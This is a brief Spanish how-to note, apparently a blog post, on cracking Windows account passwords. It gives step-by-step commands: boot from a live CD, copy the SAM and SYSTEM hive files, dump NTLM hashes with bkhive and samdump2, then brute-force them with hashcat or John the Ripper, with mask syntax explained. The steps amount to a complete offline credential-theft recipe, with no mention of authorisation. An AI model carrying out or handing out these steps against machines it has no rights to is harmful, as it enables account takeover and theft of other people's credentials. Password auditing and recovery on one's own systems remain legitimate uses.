Crackeo de passwords de windows

Por fuerza bruta:
  1. copiar c:\windows\system32\config (allí están los archivos donde guardan los hashes de las passwords). Para poder acceder a ellos reiniciar el equipo con un live cd
  2. bkhive SYSTEM fichero
  3. samdump2 SAM fichero > hashes.txt
SYSTEM y SAM son ficheros de c:\windows\system32\config.

En hashes.txt tendremos los hashes de cada usuario:

user::hash1:hash2:::

copiamos el "hash2" en un fichero de texto a parte (hash.txt) y lo atacamos con john the ripper o con hashcat:

> hashcat -o salida.txt -m 1000 -a 3 hash.txt

donde -m 1000 = NTLM hash
-a 3 = fuerza bruta
mask = ?d para digitos, ?l para letras, ?s para signos, ?a para todo, por ejempolo ?a?a33?a son passwords de 5 caracteres con "3" en la 3a y 4a posición.


Comentarios